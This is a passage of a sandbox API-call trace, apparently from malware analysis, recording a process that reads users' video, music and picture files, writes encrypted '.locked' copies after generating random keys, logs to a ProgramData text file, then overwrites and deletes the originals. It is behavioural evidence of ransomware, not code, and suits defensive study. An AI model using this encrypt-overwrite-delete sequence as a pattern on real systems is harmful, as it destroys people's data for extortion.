(lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\7C-ulOQENOkPtsd-.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\7c-uloqenokptsd-.mp3")) returned 1 [0311.828] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0312.411] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0312.425] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0312.488] SetEvent (hEvent=0x220) returned 1 [0312.488] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0316.344] SetEvent (hEvent=0x190) returned 1 [0316.345] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c2e0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e7a24, lpReserved=0x0 | out: lpBuffer=0x1234c2e0*, lpNumberOfCharsWritten=0x125e7a24*=0xc) returned 1 [0316.384] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0316.511] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\DV8adgPLs8danhHZ.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\dv8adgpls8danhhz.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0316.512] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0316.512] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\DV8adgPLs8danhHZ.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\dv8adgpls8danhhz.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0316.520] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0316.520] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0316.520] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8050 | out: pbBuffer=0x124a8050) returned 1 [0316.520] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c281 | out: pbBuffer=0x1237c281) returned 1 [0316.521] WriteFile (in: hFile=0x230, lpBuffer=0x12748000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x12748000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0316.524] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0316.530] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb30, ulCount=0x10, ulNumEntriesRemoved=0x3356fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb30, ulNumEntriesRemoved=0x3356fb10) returned 0 [0316.530] SetEvent (hEvent=0x150) returned 1 [0316.530] SetEvent (hEvent=0x214) returned 1 [0316.530] SetEvent (hEvent=0x14c) returned 1 [0316.530] ReadFile (in: hFile=0x1c8, lpBuffer=0x12b94000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x12b94000*, lpNumberOfBytesRead=0x125e7d68*=0x16697, lpOverlapped=0x0) returned 1 [0316.535] WriteFile (in: hFile=0x230, lpBuffer=0x12b94000*, nNumberOfBytesToWrite=0x16697, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x12b94000*, lpNumberOfBytesWritten=0x125e7d74*=0x16697, lpOverlapped=0x0) returned 1 [0316.547] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0316.562] SetEvent (hEvent=0x150) returned 1 [0316.562] ReadFile (in: hFile=0x1c8, lpBuffer=0x12b94000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x12b94000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0316.563] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0316.650] CloseHandle (hObject=0x230) returned 1 [0316.651] CloseHandle (hObject=0x1c8) returned 1 [0316.651] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0316.651] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x125e7e94 | out: lpMode=0x125e7e94) returned 0 [0316.651] WriteFile (in: hFile=0x1c8, lpBuffer=0x1264a140*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x125e7e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a140*, lpNumberOfBytesWritten=0x125e7e64*=0x37, lpOverlapped=0x0) returned 1 [0316.652] CloseHandle (hObject=0x1c8) returned 1 [0316.652] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\DV8adgPLs8danhHZ.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\dv8adgpls8danhhz.mp4")) returned 1 [0316.724] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\DV8adgPLs8danhHZ.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\dv8adgpls8danhhz.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0316.920] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x125e7e88 | out: lpMode=0x125e7e88) returned 0 [0316.920] WriteFile (in: hFile=0x1c8, lpBuffer=0x15c04000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e7e78, lpOverlapped=0x0 | out: lpBuffer=0x15c04000*, lpNumberOfBytesWritten=0x125e7e78*=0xfa000, lpOverlapped=0x0) returned 1 [0316.947] CloseHandle (hObject=0x1c8) returned 1 [0316.978] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.162] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\DV8adgPLs8danhHZ.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\dv8adgpls8danhhz.mp4")) returned 1 [0317.188] SetEvent (hEvent=0x214) returned 1 [0317.188] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.198] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\BahL errCaXXUL0.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\bahl errcaxxul0.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0317.326] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.390] SetEvent (hEvent=0x150) returned 1 [0317.390] SetEvent (hEvent=0x12c) returned 1 [0317.390] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1276be88 | out: lpMode=0x1276be88) returned 0 [0317.390] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.405] WriteFile (in: hFile=0x1c0, lpBuffer=0x18322000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276be78, lpOverlapped=0x0 | out: lpBuffer=0x18322000*, lpNumberOfBytesWritten=0x1276be78*=0xfa000, lpOverlapped=0x0) returned 1 [0317.436] CloseHandle (hObject=0x1c0) returned 1 [0317.436] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\BahL errCaXXUL0.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\bahl errcaxxul0.jpg")) returned 1 [0317.506] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.548] SetEvent (hEvent=0x20c) returned 1 [0317.548] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.550] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.553] SetEvent (hEvent=0x12c) returned 1 [0317.553] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.597] SetEvent (hEvent=0x214) returned 1 [0317.597] SetEvent (hEvent=0x134) returned 1 [0317.597] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.598] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.610] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.615] SetEvent (hEvent=0x1e8) returned 1 [0317.615] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.724] SetEvent (hEvent=0x1e8) returned 1 [0317.724] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.725] SetEvent (hEvent=0x22c) returned 1 [0317.725] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.729] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.732] SetEvent (hEvent=0x12c) returned 1 [0317.732] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0317.802] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.802] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0317.804] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.805] SetEvent (hEvent=0x1f0) returned 1 [0317.805] SetEvent (hEvent=0x22c) returned 1 [0317.805] SetEvent (hEvent=0x1e8) returned 1 [0317.805] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.806] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0317.806] SetEvent (hEvent=0x150) returned 1 [0317.806] SetEvent (hEvent=0x1e8) returned 1 [0317.806] SetEvent (hEvent=0x22c) returned 1 [0317.807] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e0a0 | out: pbBuffer=0x1263e0a0) returned 1 [0317.807] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e090 | out: pbBuffer=0x1234e090) returned 1 [0317.807] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c201 | out: pbBuffer=0x1237c201) returned 1 [0317.807] WriteFile (in: hFile=0x200, lpBuffer=0x12375000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e1d78, lpOverlapped=0x0 | out: lpBuffer=0x12375000*, lpNumberOfBytesWritten=0x125e1d78*=0x80, lpOverlapped=0x0) returned 1 [0317.811] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0317.811] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb30, ulCount=0x10, ulNumEntriesRemoved=0x3356fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb30, ulNumEntriesRemoved=0x3356fb10) returned 0 [0317.812] SetEvent (hEvent=0x22c) returned 1 [0317.812] SetEvent (hEvent=0x1e8) returned 1 [0317.812] ReadFile (in: hFile=0x218, lpBuffer=0x14f06000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x14f06000*, lpNumberOfBytesRead=0x125e1d68*=0xdb0c, lpOverlapped=0x0) returned 1 [0317.815] WriteFile (in: hFile=0x200, lpBuffer=0x14f06000*, nNumberOfBytesToWrite=0xdb0c, lpNumberOfBytesWritten=0x125e1d74, lpOverlapped=0x0 | out: lpBuffer=0x14f06000*, lpNumberOfBytesWritten=0x125e1d74*=0xdb0c, lpOverlapped=0x0) returned 1 [0317.818] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0317.878] ReadFile (in: hFile=0x218, lpBuffer=0x14f06000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x14f06000*, lpNumberOfBytesRead=0x125e1d68*=0x0, lpOverlapped=0x0) returned 1 [0317.879] CloseHandle (hObject=0x200) returned 1 [0317.879] CloseHandle (hObject=0x218) returned 1 [0317.879] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0317.879] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e1e94 | out: lpMode=0x125e1e94) returned 0 [0317.879] WriteFile (in: hFile=0x218, lpBuffer=0x125ec280*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x125e1e64, lpOverlapped=0x0 | out: lpBuffer=0x125ec280*, lpNumberOfBytesWritten=0x125e1e64*=0x43, lpOverlapped=0x0) returned 1 [0317.879] CloseHandle (hObject=0x218) returned 1 [0317.880] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\4Jdh3Gyu6WoYeQm.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\4jdh3gyu6woyeqm.flv")) returned 1 [0317.923] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0318.182] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\4Jdh3Gyu6WoYeQm.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\4jdh3gyu6woyeqm.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0318.627] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0318.656] SetEvent (hEvent=0x150) returned 1 [0318.656] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125e1e88 | out: lpMode=0x125e1e88) returned 0 [0318.657] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0318.732] SetEvent (hEvent=0x134) returned 1 [0318.732] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0318.736] SetEvent (hEvent=0x20c) returned 1 [0318.736] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0318.868] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0318.895] SetEvent (hEvent=0x1dc) returned 1 [0318.895] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0318.897] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0318.898] SetEvent (hEvent=0x1e8) returned 1 [0318.898] SetEvent (hEvent=0x190) returned 1 [0318.898] SetEvent (hEvent=0x14c) returned 1 [0318.898] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0318.899] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0318.899] SetEvent (hEvent=0x1e8) returned 1 [0318.899] SetEvent (hEvent=0x190) returned 1 [0318.899] SetEvent (hEvent=0x14c) returned 1 [0318.926] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\CUoTLa2sZ2sB3Af.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\cuotla2sz2sb3af.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0318.938] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12633e88 | out: lpMode=0x12633e88) returned 0 [0318.938] WriteFile (in: hFile=0x230, lpBuffer=0x13788000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12633e78, lpOverlapped=0x0 | out: lpBuffer=0x13788000*, lpNumberOfBytesWritten=0x12633e78*=0xfa000, lpOverlapped=0x0) returned 1 [0318.959] CloseHandle (hObject=0x230) returned 1 [0318.997] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0319.473] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\CUoTLa2sZ2sB3Af.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\cuotla2sz2sb3af.mp4")) returned 1 [0320.403] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.405] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.410] SetEvent (hEvent=0x14c) returned 1 [0320.410] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.432] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.436] SetEvent (hEvent=0x14c) returned 1 [0320.436] SwitchToThread () returned 1 [0320.437] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.439] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.495] SetEvent (hEvent=0x22c) returned 1 [0320.495] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.510] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\geY--KBb2-E.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\gey--kbb2-e.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0320.510] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1276ad9c | out: lpMode=0x1276ad9c) returned 0 [0320.510] SetEvent (hEvent=0x1dc) returned 1 [0320.510] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.512] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.540] SetEvent (hEvent=0x190) returned 1 [0320.540] SetEvent (hEvent=0x21c) returned 1 [0320.540] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.617] SetEvent (hEvent=0x22c) returned 1 [0320.617] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.711] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.716] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\geY--KBb2-E.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\gey--kbb2-e.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0320.717] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1276ad9c | out: lpMode=0x1276ad9c) returned 0 [0320.717] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0320.717] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766040 | out: pbBuffer=0x12766040) returned 1 [0320.717] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0320.718] WriteFile (in: hFile=0x1b0, lpBuffer=0x1267d000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12657d78, lpOverlapped=0x0 | out: lpBuffer=0x1267d000*, lpNumberOfBytesWritten=0x12657d78*=0x80, lpOverlapped=0x0) returned 1 [0320.721] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0320.722] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb30, ulCount=0x10, ulNumEntriesRemoved=0x3356fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb30, ulNumEntriesRemoved=0x3356fb10) returned 0 [0320.722] SetEvent (hEvent=0x150) returned 1 [0320.722] SetEvent (hEvent=0x134) returned 1 [0320.722] SetEvent (hEvent=0x104) returned 1 [0320.722] SetEvent (hEvent=0x180) returned 1 [0320.722] ReadFile (in: hFile=0x1bc, lpBuffer=0x17e78000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x17e78000*, lpNumberOfBytesRead=0x12657d68*=0x543f, lpOverlapped=0x0) returned 1 [0320.725] WriteFile (in: hFile=0x1b0, lpBuffer=0x17e78000*, nNumberOfBytesToWrite=0x543f, lpNumberOfBytesWritten=0x12657d74, lpOverlapped=0x0 | out: lpBuffer=0x17e78000*, lpNumberOfBytesWritten=0x12657d74*=0x543f, lpOverlapped=0x0) returned 1 [0320.833] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.903] ReadFile (in: hFile=0x1bc, lpBuffer=0x17e78000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x17e78000*, lpNumberOfBytesRead=0x12657d68*=0x0, lpOverlapped=0x0) returned 1 [0320.903] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0320.993] SetEvent (hEvent=0x214) returned 1 [0320.993] CloseHandle (hObject=0x1b0) returned 1 [0320.993] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0321.077] CloseHandle (hObject=0x1bc) returned 1 [0321.077] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0321.077] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12657e94 | out: lpMode=0x12657e94) returned 0 [0321.078] WriteFile (in: hFile=0x1bc, lpBuffer=0x126700c0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12657e64, lpOverlapped=0x0 | out: lpBuffer=0x126700c0*, lpNumberOfBytesWritten=0x12657e64*=0x32, lpOverlapped=0x0) returned 1 [0321.115] CloseHandle (hObject=0x1bc) returned 1 [0321.116] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\geY--KBb2-E.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\gey--kbb2-e.flv")) returned 1 [0321.126] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0321.189] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0321.192] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0321.192] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb30, ulCount=0x10, ulNumEntriesRemoved=0x3356fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb30, ulNumEntriesRemoved=0x3356fb10) returned 0 [0321.192] SetEvent (hEvent=0x21c) returned 1 [0321.200] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\geY--KBb2-E.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\gey--kbb2-e.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0321.244] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0321.246] SetEvent (hEvent=0x150) returned 1 [0321.246] SetEvent (hEvent=0x214) returned 1 [0321.246] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12657e88 | out: lpMode=0x12657e88) returned 0 [0321.246] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0321.324] SetEvent (hEvent=0x190) returned 1 [0321.324] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0321.325] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0321.381] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\zPSZHcru.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\zpszhcru.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0321.381] GetConsoleMode (in: hConsoleHandle=0x240, lpMode=0x1276ed9c | out: lpMode=0x1276ed9c) returned 0 [0321.381] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\zPSZHcru.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\zpszhcru.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0321.382] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1276ed9c | out: lpMode=0x1276ed9c) returned 0 [0321.382] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0321.382] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8010 | out: pbBuffer=0x124a8010) returned 1 [0321.382] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0321.382] WriteFile (in: hFile=0x1f4, lpBuffer=0x126f5000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x126f5000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0321.384] ReadFile (in: hFile=0x240, lpBuffer=0x12a8c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x12a8c000*, lpNumberOfBytesRead=0x123a3d68*=0xf887, lpOverlapped=0x0) returned 1 [0321.387] WriteFile (in: hFile=0x1f4, lpBuffer=0x12a8c000*, nNumberOfBytesToWrite=0xf887, lpNumberOfBytesWritten=0x123a3d74, lpOverlapped=0x0 | out: lpBuffer=0x12a8c000*, lpNumberOfBytesWritten=0x123a3d74*=0xf887, lpOverlapped=0x0) returned 1 [0321.518] ReadFile (in: hFile=0x240, lpBuffer=0x12a8c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x12a8c000*, lpNumberOfBytesRead=0x123a3d68*=0x0, lpOverlapped=0x0) returned 1 [0321.518] CloseHandle (hObject=0x1f4) returned 1 [0321.551] CloseHandle 